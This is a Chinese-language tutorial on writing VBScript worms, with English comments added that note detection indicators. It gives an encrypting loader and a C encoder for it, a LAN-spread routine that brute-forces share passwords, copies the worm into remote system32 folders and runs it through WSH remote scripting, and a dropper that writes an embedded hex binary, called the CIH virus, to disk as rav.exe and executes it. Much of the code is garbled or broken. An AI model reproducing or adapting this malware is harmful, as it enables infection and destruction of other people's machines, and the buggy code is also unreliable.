(2).病毒要尽可能地用到变形功能,使用新的加密算法,当然脚本的加密算法是很简单的,在这一点上新欢乐时光
就做得很好.
' Runs whatever DeCode returns as VBScript; the quoted literal is the encoded body.
' Detection note: Execute applied to a string decoded at runtime is a common
' script-obfuscation pattern and a useful trigger for script-host monitoring.
Execute DeCode("kqe`mv fcjjm ")
' Decodes a string one character at a time.
' Mapping (from the If chain below): byte 15 -> LF, 16 -> CR, 17 -> space, 18 -> TAB,
' any other byte -> that byte minus 2. The decoded text is accumulated in DeCode
' (VBScript is case-insensitive, so "Decode" on the append line is the same variable).
' Note: a literal space (32) is not one of the four escapes, so it decodes to chr(30).
Function DeCode(Coded)
For i=1 To Len(Coded)
Curchar=Mid(Coded,i,1)
If Asc(Curchar) = 15 then Curchar=chr(10)
Else if Asc(Curchar) = 16 then Curchar=chr(13)
Else if Asc(Curchar) = 17 then Curchar=chr(32)
Else if Asc(Curchar) = 18 then Curchar=chr(9)
Else Curchar=chr(Asc(Curchar)-2)
end if
DeCode=Decode & Curchar
Next
End function
下面给出一个c的示例(程序有点问题,请老师指教一下^_^)
#include <string.h>
#include <stdio.h>
/*
 * Rewrites a script file named on stdin in place, then wraps the result in an
 * "Execute DeCode(...)" call followed by the source text of the DeCode function.
 *
 * Steps as written:
 *   1. read the file name with gets() (no length bound on name[30]);
 *   2. walk the file byte by byte applying the DeCode byte mapping
 *      (15->10, 16->13, 17->32, 18->9, otherwise value-2) and writing each
 *      byte back over itself;
 *   3. re-read the file in chunks of up to 80 characters into buf;
 *   4. truncate the file and emit exc + chunks + excu + the three function strings.
 *
 * exit() is called without including <stdlib.h>.
 */
main()
{
FILE *in,*out,*read;
/* Wrapper text that precedes / follows the encoded body. */
char *exc="Execute DeCode(\\"";
char *excu="\\")\\n";
/* Source of the DeCode function, split across three string literals. */
char *func="Function DeCode(Coded)\\nFor i=1 To Len(Coded)\\nCurchar=Mid(Coded,i,1)\\n";
char *funct="If Asc(Curchar) = 15 then Curchar=chr(10)\\nElse if Asc(Curchar) = 16 then Curchar=chr(13)\\n";
char *functi="Else if Asc(Curchar) = 17 then Curchar=chr(32)\\nElse if Asc(Curchar) = 18 then Curchar=chr(9)\\nElse Curchar=chr(Asc(Curchar)-2)\\nend if\\nDeCode=Decode & Curchar\\nNext\\nEnd function\\n";
char buf[100][101];
char name[30];
char ch;
char *p;
int i=0,j=0;
gets(name);
if((in=fopen(name,"r+"))==NULL)
{
printf("Can\''t open the file %",name);
exit(0);
}
/* Pass 1: in-place byte mapping. */
ch=getc(in);
while(!feof(in))
{
if(ch==15) ch=10;
else if(ch==16) ch=13;
else if(ch==17) ch=32;
else if(ch==18) ch=9;
else ch=ch-2;
/* Step back one byte, overwrite it, then re-sync the stream before the next read. */
fseek(in,-1L,1);
fputc(ch,in);
fseek(in,0L,1);
ch=getc(in);
}
fclose(in);
/* Pass 2: read the mapped file back into buf, at most 100 chunks of 80 chars. */
read=fopen(name,"r+");
do
{
if(i>=100)
{
fclose(in);
}
p=fgets(buf,80,in);
i++;
}while(p!=NULL);
fclose(read);
/* Pass 3: truncate and write wrapper + body + decoder source. */
out=fopen(name,"w+");
fputs(exc,out);
for(;j<i-1;j++)
{
fputs(buf[j],out);
}
fputs(excu,out);
fputs(func,out);
fputs(funct,out);
fputs(functi,out);
fclose(out);
}
2, 病毒的攻击性可以扩展到有系统漏洞的主机上,蠕虫可以利用一些基本的DOS命令和第三方黑客工具来进行漏洞攻击
3,病毒利用邮件和局域网进行传播:
攻击局域网可以采用简化的network代码,并利用vmi直接在远程主机上运行病毒体,且可以破译共享密码(穷举破解的话,太费时间,
也没什么必要):
' LAN-spread routine. Picks a random address, repeatedly tries to map drive I:
' to that host's C share with a password built one character at a time, and once
' a drive is connected copies the script over, disconnects, opens a
' \\name\con\con path through the shell object, and calls run() to start the
' copied script remotely.
'
' Detection notes (from what is visible here):
'   - the COM ProgIDs are assembled from concatenated fragments
'     ("scrip"+"ting."+...), a classic signature-evasion trick in VBS malware;
'   - On Error Resume Next hides every failure, so the loop keeps going;
'   - observable host/network indicators are repeated MapNetworkDrive calls to
'     I: with varying passwords and file copies into remote windows/system32 paths.
Sub netshare()
Dim o1,o2,o3,o4,rand,dot,count,name,driveconnected, pwd,strings ,k
count = "0"
dot = "."
driveconnected="0"
set yu=createobject("scrip"+"ting."+"filesyst"+"emob"+"ject")
set net=createobject("wsc"+"ript.n"+"etwork")
set qq=createobject("WSc"+"ript.S"+"hell")
on error resume next
randomize
randaddress()
do
' Inner loop: keep guessing until enumdrives() reports the drive as connected.
do while driveconnected ="0"
checkadress()
sharename()
pwd = ""
pqd = ""
strings = "0123456789abcdefghijklmnopqrstuvwxyz"
' One MapNetworkDrive attempt per candidate character; the user/password
' arguments are passed as the quoted literals shown, not as evaluated expressions.
For k = 1 to len(strings) step 1
net.mapnetworkdrive "I:", "\\\\" & "name" &"\\C" , "& pwd & mid(strings,k,1)" , "& pqd & mid(strings,k,1)"
If instr(net.Body, Wrong) <> 0 Then
pwd = pwd & mid(strings,k,1)
End If
Next
’crack the share password
enumdrives()
loop
copy()
disconnectdrive()
qq "\\\\name\\con\\con",0
run ()
loop
end sub
' Launches "system.vbe" on the host named by `name` through WSH remote scripting
' (WSHController.CreateScript) and polls every 100 ms until Status = 2, then
' hands any remote error to remote_Error via the "remote_" event prefix.
' Mitigation note: WSH remote scripting is disabled by default and must be
' explicitly enabled on the target; keeping it off blocks this step.
function run()
Dim Controller, RemoteScript
Set Controller = WScript.CreateObject("WSHC"+"ontroller")
Set RemoteScript = Controller.CreateScript("system.vbe", "name")
WScript.ConnectObject RemoteScript, "remote_"
RemoteScript.Execute
Do While RemoteScript.Status <> 2
WScript.Sleep 100
Loop
WScript.DisconnectObject RemoteScript
remote_Error()
end function
' Event handler bound by the "remote_" prefix in run(): reports the remote
' script's error number, line, column and description, then exits with -1.
Sub remote_Error
Dim theError
Set theError = RemoteScript.Error
WScript.Echo "Error " & theError.Number & " - Line: " & theError.Line & ", Char: " & theError.Character & vbCrLf & "Description: " & theError.Description
WScript.Quit -1
End Sub
' Removes the I: mapping created in netshare() and resets the connected flag
' (stored as the string "0", matching the comparison in netshare()).
Function disconnectdrive()
net.removenetworkdrive "I:"
driveconnected = "0"
end function
' Copies system.vbe and system.inf from dir2 to the mapped remote drive under
' windows\, windows\system32\ and winnt\system32\. dir2 is not defined in this
' listing. These destination paths are the file-system indicators to watch for.
Function copy()
yu.copyfile dir2&"\\system.vbe", "I:\\windows\\"
yu.copyfile dir2&"\\system.vbe", "I:\\windows\\system32\\"
yu.copyfile dir2&"\\system.vbe", "I:\\winnt\\system32\\"
yu.copyfile dir2&"\\system.inf", "I:\\winnt\\system32\\"
yu.copyfile dir2&"\\system.inf", "I:\\windows\\system32\\"
’copy to the other machine.
end function
' Advances the last octet; when it reaches 255 a fresh random address is drawn.
' (netshare() calls "checkadress()" - a different spelling - so under
' On Error Resume Next that call resolves to nothing.)
Function checkaddress()
o4 = o4 +1
if o4 = "255" then randaddress()
end function
' Assigns the quoted literal shown to `name`; the octet variables inside the
' quotes are part of the string text, not evaluated.
Function sharename()
name = " octa & dot & octb & dot & octc & dot & octd "
end function
' Walks the current network-drive list and sets driveconnected to 1 if an entry
' equals `name`, otherwise 0. The flag is overwritten on every iteration, so the
' last item decides the final value. Note it is set as a number here but compared
' against the string "0" in netshare().
Function enumdrives()
set you=net.enumnetworkdrives
For p = 0 to you.Count -1
if name = you.item(p) then
driveconnected = 1
else
driveconnected = 0
end if
Next
end function
' Stores a random integer in the range 1..254 in the shared variable `rand`.
Function randum()
rand = int((254 * rnd) + 1)
end function
' Chooses a new target address in o1..o4. For the first 50 picks o1 is drawn
' from 199..214; afterwards it is fully random. o2 and o3 are random, o4 starts
' at "1". The counter is written to `coun` (not `count`), so the `count < 50`
' branch is the one always taken.
Function randaddress()
if count < 50 then
o1=Int((16) * Rnd + 199)
coun=count + 1
else
randum()
o1=rand
end if
randum()
o2=rand
randum()
o3=rand
o4="1"
end function
4,蠕虫体内可以携带其他病毒体或木马,看下面一例:
Sub kill()
Set yu=CreateObject("Scrip"+"ting.F"+"ileSys"+"temOb"+"ject")
Set aa=CreateObject("WSc"+"ript.S"+"hell")
bb = "4D5A000300000004000000FFFF0000000000000000004000000000000000000000000000000000000000000000000000000000000000000
00000800000000E1F3F003F3F3F4C3F546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240
0000000000055504500004C01040066553F0000000000000000000E010B01023200020000000C00000000000040020000001000000020000000004
0000010000000020000010000000000000004000000000000000050000000040000470000020000000000100000100000000010000010000000000
000100000000000000000000000002000000000000030000004070000000000000000000000000000000000000040000014000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000050207400000000020000001000000002000000040000000000000000000000000000600000602E6964617461
000000020000002000000002000000060000000000000000000000000000400000402E727372630000000010000000300000000800000008000000
0000000000000000000000400000402E72656C6F63000034000000004000000002000000100000000000000000000000000000400000422E727372
63000000802B000000000100000000000000003F4000550100003F40003F0000558D44243FDB643F000000005B8D4B425150500F014C24FE5B83C3
1CFA8B2B668B6BFC8D711256668973FCC13F668973025ECC568BF08B48FCF3A4833F3F0BF67402EBF05ECCFB33DBEB0733DB643F3F643F585D680C
104000C374320F21C1E3103F241566896BFCC13F66896B023F23C36A0F516AFF5151516A016A023F5300010083C420978D469DCF8D87E7FCFFFF50
3F670040000F23C0588B4E3D3F8950FC8D40D68901FAEBB653000000005B83C324533F6800400058FF742408FF53FC595053FF53FC590F23C0585BC
3561702C060000000005E81C6130300003F010F3F0200008D5C24283F240F85F50100003F83C605568A43043CFF740804403F3F46466A006A7F8B5B
108B430C83C00450563F4100400083C410817C063F4558455E0F85B601000066837B18010F85AB0100006600433F320040000F829B010000518BBE5
23FFF3FF6C1017408663F43333F3FC0B43F3FD2428BDA43FFD793599CF63F7406663F43FFD79D0F8262010000569C833F33C0B4D68BE86A04596A3C
5AFFD78B164A8BC5FFD7813E005045000F3F010000536A006A016D737061696E742E65786500558BEC83EC4456FF155C2040008BF0003C227513463
F84C074043C2275F5803E22750D463F3C207E0646803E207FFA803E00740B803E207F0646803E0075F5C745000000008D45BC50FF1558204000F645
3F3F00000074040FB745EC50566A006A00FF1564204000503F0000005E8BE55D3F7424106A00FF74241468001040006A006A00FF156C2040006A00F
F156020400033C0C2100052570F23CC508BC5B15283C207FFD78D4222503F500FB7460E8D5410123F3FF6E18D76325052564151C1E10351033F3F4E
1CF7D14151918B463F46FC8986AD3FFF663F24007C7B8BC5FFD7956A0459528B563C83C212FFD7813E6E5A697074675A5B5F595703D55203EE558D4
43DFC89185303D7528DBE4F3FFF578956CE8D56D8BD3F00003F83C2288B5A102B5A08762C5383E8083F8B5A14035A0853578B5A08035A0C035EFC89
58043F015A08814A24400000402BEB760E03FBE23F21CCEB3383C43CEB4A0128016C240833DB8958FC8D869F3FFF3F66003F8B943FFFFFFF8950020
FB6943126FFFFFF2BC2E23F21C88B58103F593F8BF13F00005A59FFD7EBF05B58F99C33C0B43FD79D5E73318BDF663F438B4EFC8B7E3FD3FE4EFB61
0F213F208BDCFF7338FF53245989431C837B282475068B41283C200000ACDE1B32FFFFFFFF3F00005820000050200000433F32FFFFFFFF3F00006C
20000000000000000000000000000000000000000000003F00003F00003F000074200000000000003F000000000000D076F7BFC1A0F8BF2AB0F83F7
6F7BF000000001192DE7F00000000004765744D6F64756C6548616E646C65410000240147657453746172747570496E666F410000476574436F6D6D
616E644C696E65410071004578697450726F63657373004B45524E454C33322E646C6C00004E005368656C6C4578656375746541005348454C4C333
22E646C6C0089460161C3B007E670E471342675D366BDF80C8D76C5BF4C38008066BAFE0C3FD666BF58004A66C74608240FFFD68D5EF4B855550E00
B9AA2A0E00FFD3C6006051E2FE32E4880091E2FEB855550F0059B5AAFFD3C60020E2FEB4E00066C746080C10FF3FDBB7805383EC2C68001000C0B70
85351515168010500404151518BF481EC0000003F0400100066837E06177405FE464DEBEE015E10C6464D80EBE53F3F00803F3FC39787D5EF9787D5
3F449787D5EF9787D5EE003A6627530001006800400041004000320040004349482076312E3420544154554E4700000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000001097660A040000000000030003000000
280000800E000000400000801000000058000080000000001097660A04000000000001000100000070000080000000001097660A040000000000010
001000000000080000000001097660A040000000000010001000000000080000000001097660A040000000000010004040000000000000000001097
660A040000000000010004040000000000000000001097660A0400000000000100040400000000003F00003F00003F0000000000003F00001400000
03F0000000000003F0000200300003F0000000000002800000020000000400000000100040000000000000200000000000000000000000000000000
000000000000000080000080000000808000800000008000800080800000C0C000808080000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0
000FFFFFF00000000000000000000000000000000000000000000003333333333300000000000000000037B7B7B7B7B7B733300000000000008B7B7
B7B44444B7B73F0000000000FB7B7B7B4CCCCC447B7B73300000000FB7B7B7B7CCCCCCCC47B7B730000000FB7B7B7B7BCCCCCCCC4B7B7B3300000FB
7B71117B7BCCCCCC4B7B7B700000B7B7199911B7B7CCC7B7B7B7B730000B7B719999991B7B7B7B7B7B7B700007B7B99993F7B7B7B7B7B7B7B730000
B7B7999991B7B7B70007B7B7000F7B7B7999917B7B7B3000007B7B73000FB7B7B79997B7B7B30000073F000F7B7B7B7B7B7B7B73000C00077730000
F3F2227B7B7B7B300003F7300000F722A2A227B7B7B7730000C088000000FB2A2A2A227B7B7B77333700000000F7B2A2A2A2B7B7B7B7B7B730F0000
000FB7A2A2A2B7B7B7B7B7B7300000000F7B7A2A7B7B7B7B7B7B7300000F000000F7B7B7B7B75555B7B730000000000000FB7B7B7B55DDD55B7B3000
0000000000F7B7B7B5DDDDDD57000000000F00007F7B7BDDDDDDD57B730000000000000FB7B7BDDDDDD53F000000000000000F7B7BDDDDDD7B7B3000
00000000000000F7B7B7B7B7B70000000000000000000FFF7B7B7B77300000000000000000000007FFFFFF7000000000000000000000000000000000
000000000000000000000000000000000000000000000000FCF001FF00003F00000F00000700000300000300000100000100000180000001800000018
0000001000006010000030300001103000018070000000F0000001F0000001F000000000001C7800003E1800003F0800007F0800007F8C0000FFCC000
0FFCE0001FFDF0003FFF007FFF3FFFFFFFFFFFFF00000100010020201000010004003F00000100200334000000560053005F005600450052005300490
04F004E005F0049004E0046004F00000000003FEFFE00000100000004003F0000000004003F00003F0000000000000001000100010000000000000000
0000000000000080020000010053007400720069006E006700460069006C00650049006E0066006F0000005C020000010030003400300034003000340
04200300000004C001600010043006F006D00700061006E0079004E0061006D006500000000004D006900630072006F0073006F006600740020004300
6F00720070006F0072006100740069006F006E00000040000C000100460069006C0065004400650073006300720069007000740069006F006E0000000
000570069006E0064006F00770073002000BF8A7282E4760000340009000100460069006C006500560065007200730069006F006E000000000034002E
00300030002E00390035003000000000002F000700010049006E007400650072006E0061006C004E0061006D006500000050006200720075007300680
0000000007000260001004C006500670061006C0043006F007000790072006900670068007400000043006F00700079007200690067006800740020006
30020004D006900630072006F0073006F0066007400200043006F00720070002E00200031003900390031002D00310039003900350000003F000B0001
004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000005000420052005500530048002E00450058004500000000006C
0025000100500072006F0064007500630074004E0061006D006500000000004D006900630072006F0073006F006600740052002000570069006E0064
006F0077007300520020004F007000650072006100740069006E0067002000530079007300740065006D0000000000380009000100500072006F0064
00750063007400560065007200730069006F006E00000034002E00300030002E0039003500300000000000440000000100560061007200460069006C
00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E000000000004043F50414444494E47585850
414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E
47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E475041
4444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E4758585041444449
4E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850
4144001000001400000015305B3076303F3F3F0000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000"
vv = they(bb)
Set tt = yu.createtextfile(yu.getspecialfolder(0) & "\\rav.exe",true)
tt.write vv
tt.close
aa.run yu.getspecialfolder(0) & "\\rav.exe", 1, false
they(our)
end sub
' Converts a string of hex digit pairs into the bytes they encode: each pair is
' read as "&hXX" and appended as Chr(). Used above to rebuild the embedded binary
' from the bb literal before it is written to disk. Detection note: Chr("&h" & ...)
' loops over a long hex literal are a reliable indicator of an embedded payload.
Function they(our)
For mine = 1 To Len(our) Step 2
they = they & Chr("&h" & Mid(our, mine, 2))
Next
End Function
上面bb=" "中间一堆的十六进制代码就是CIH病毒体,也可以携带其他的病毒体或木马程序,你可以先用c写一段代码,把*.exe转化成16进制的形式,
写入病毒体内,然后用function they(our)函数将其还原并运行之^_^ 下面给出一个c的示例:
#include <string.h>
#include <stdio.h>
/*
 * Per the prose above, meant to dump a line of input as hex into c:\letter.txt.
 * As written: reads a line with gets() (no bound on letter[250]), opens the
 * output file, and for each character position runs one fprintf with the format
 * "%x00", passing `letter` (the array, i.e. its address) as the %x argument and
 * fp as a surplus argument. exit() is called without including <stdlib.h>.
 */
main()
{
FILE *fp;
char letter[250];
int i,lenth;
gets(letter);
if((fp=fopen("c:\\\\letter.txt","w+"))==NULL)
{
printf("Can\''t open the file.\\n");
exit(1);
}
/* One fprintf per input character; strlen() is re-evaluated every iteration. */
for(i=0;i<strlen(letter);i++)
fprintf(fp,"%x00",letter,fp);
fclose(fp);
}